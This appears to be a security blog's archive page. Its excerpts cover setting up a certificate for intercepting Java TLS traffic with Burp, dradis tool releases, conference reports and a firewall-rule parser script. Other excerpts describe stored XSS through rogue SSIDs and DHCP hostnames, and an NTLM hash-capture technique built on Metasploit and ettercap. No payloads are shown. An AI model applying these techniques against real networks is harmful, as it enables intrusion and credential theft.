usefulfor.com/security

x509 certificate generation

Generate the certificate using OpenSSL:-

$ openssl genrsa 1024 > foo.key
$ openssl req -new -x509 -nodes -sha1 -days 7300 -key foo.key > foo.crt
$ openssl pkcs12 -export -out foo.p12 -in foo.crt -inkey foo.key -name "your name"

You will need the .p12 file (contains key and certificate) to configure Burp. And the .crt file to add it to the Java keystore used by the client. Checkout Burp’s help page for instructions on how to get the first done.

Create a Java keystore, import the certificate

Straightforward enough (just remember the password you entered):

keytool.exe -import -file foo.crt -keystore usefulfor.jks -alias burpcert

Run the application and point it to your keystore

java \
  -Djavax.net.ssl.trustStore=usefulfor.jks \
  -Djavax.net.ssl.trustStorePassword=password \
  -Djavax.net.debug=all  \
  com.usefulfor.Demo

Other interesting properties that you may need in order to further tweak the SSL configuration are javax.net.ssl.keyStore and javax.net.ssl.keyStorePassword.

It has been a long time since the last formal release of dradis (remember the dradis v1.2 one-click installer?). But that does not mean we have been doing nothing in the mean time

We have been working as hard as one can work: over 487 commits since then (check the stats), we went to DEFCON 16 where a pre-release of the new dradis v2.0 was showcased… But finally we are here, there is a new release ready for you to try and get addicted to!

Lots of new features: new web interface (+10 neatness, +20 usability), new internal architecture (+30 flexibility), new built-in modules (+10 usefulness)…

Read the rest of this entry »

DeepSec 2008 took place in Vienna in November. For a period of two days attendees enjoyed a good set of talks, a good atmosphere and had the chance to talk to different people from different security backgrounds.

I was invited to present my ‘Behind Enemy lines’ research, which mainly focused on different attack techniques that are currently affecting a large number of administrative web interfaces.

The slides of this presentation can be found here: [1]

More information about this research can be found in the following white paper: [3] [4]

Recently I had to go through the ruleset of a Lucent firewall, and the truth is that the export format of the rules is everything but easy to read.

The information is split into three files:

• rules file: Contains the rules, each one takes about 72 lines (rules have many properties, each property is written in a separate line). Rules match source hosts with destination hosts and services, no surprise there, but the value of any of this three key fields can be an alias.
• hosts file: in this file the aliases for host groups are defined.
• services file: service groups are defined here.

So the challenge here is: how do we merge this three files into something meaningful?

I know that purists can do this with a bash one-liner that uses grep, awk and sed, but ruby is my weapon of choice, so I created the lucent_metaparser.rb script. It basically takes the three files and applies some regular expressions to extract the information and store it into data structures and then outputs the rules in format that is easy to go through. Here is an example:-

1047: (CH43) 10.0.1.12 ---(both)--- RF400 [permit https - change 43] - enabled | pass
CH43: tcp/443/* ()
10.0.1.12
RF400: 192.168.1.140-192.168.1.145;192.252.1.155;192.252.1.120;
1048: (tcp/80) RF132 ---(both)--- PK012 [web traffic to the dmz - change 74] - enabled | pass
tcp/80
RF132: 172.0.1.38-172.0.1.226 (external reverse proxies)
PK012: 10.15.2.1;10.15.2.2; (internal servers)

I know that it is not perfect and there is room for improvement, but the idea is that the script can be used as a starting point for the review process, and hopefully this will save us some time in the future

hack-fu by Matt Hillman

Last week I attended DEFCON 16 in Las Vegas. I went last year as well, so I knew to expect the huge throngs of people, the strange mix of young, old, and crazy-haired and all the usual antics that happens when you gather around 7 thousand hackers in one place.

There’s a lot to do at DEFCON besides attending presentations, but this year I was there for business not just pleasure, so I went on a presentation-attending marathon. I must admit that this year there were less “wow” moments as far as the talks were concerned, but there were still some decent talks ands of course lots of opportunities to catch up with friends and acquaintances from around the world.

Here’s a list and some comments of the talks I attended:
Read the rest of this entry »

The administrative web interfaces for many wireless access points (APs) provide users with ‘Neighbourhood Wireless Scan’ functionality. This functionality scans for all accessible APs and displays the details of any APs which are identified. However, examination of these administrative interfaces revealed that a large number of them do not properly sanitise the parameters that are passed to them from any accessible APs.

An attacker could set up a fake AP with a malicious payload in the Service Set Identifier (SSID). The malicious SSID would be displayed in the ‘Neighbour’s Access Points Table’ page of the administrative interface and would be executed when an administrator scanned for APs. Read the rest of this entry »

A number of administrative applications are available which allow users to manage a network DHCP server via a web interface. This allows administrators to set up configuration options and view active DHCP leases.

it was found that a large number of these administrative web applications did not properly sanitise parameters that were passed to them from the DHCP server and therefore an attacker. In particular, a specially crafted DHCPREQUEST message containing malicious JavaScript or HTML code in the DHCP Options Hostname field could be sent to the DHCP server; the malicious code would then be displayed in the DHCP active leases page of the vulnerable administrative application and would be executed when an administrator visited the page. Read the rest of this entry »

hack-fu by: rux0r

In the last article (middleware and me (part-1)) we looked at the concept of Middleware security and why it is often a neglected area. In this article we are moving on to look in detail at the security features that can be employed to protect this type of software. For the purposes of these discussions we are going to be focussing on the IBM Websphere MQ product, hopefully in the future I will be able to contrast these discussions against the security controls employed by a number of other messaging technologies.
Read the rest of this entry »

hack-fu by: bob So… this is an amalgamtion of several ideas and bits of work I’ve found floating around that I put together. The result is a handy pentesting/pwnage technique. The following blog that kicked this idea off discusses a modified Metasploit exploit module called smb_server.pm by Kurt Grutzmacher: NTLMv1, Metasploit and You. Around the same time I’d been playing with some ettercap filters, based on the below work at Irongeek: Fun with Ettercap Filters. These two sparked something and gave me a use of those huge LMHALFCHALLENGE rainbow tables I’d downloaded. Read the rest of this entry »

In adition to the changes released on the 4^th of April, yesterday we released a Windows one-click installer for dradis.

The summary of the features of the v1.2 release:

• in the client:
  • export to XML module is now part of the standard module set.
  • a new implementation of the command line parser: now it is possible to use single and double quotes to pass multi-word arguments to the different commands.
  • fixed the window.rb:159 bug.
• in the server:
  • a slightly less annoying implementation of the web interface auto refresh functionality.
  • the services added through the web interface can have a name now
  • simple prevention against embedded XSS.

You can also download the platform-independent ruby source in the download section of the site.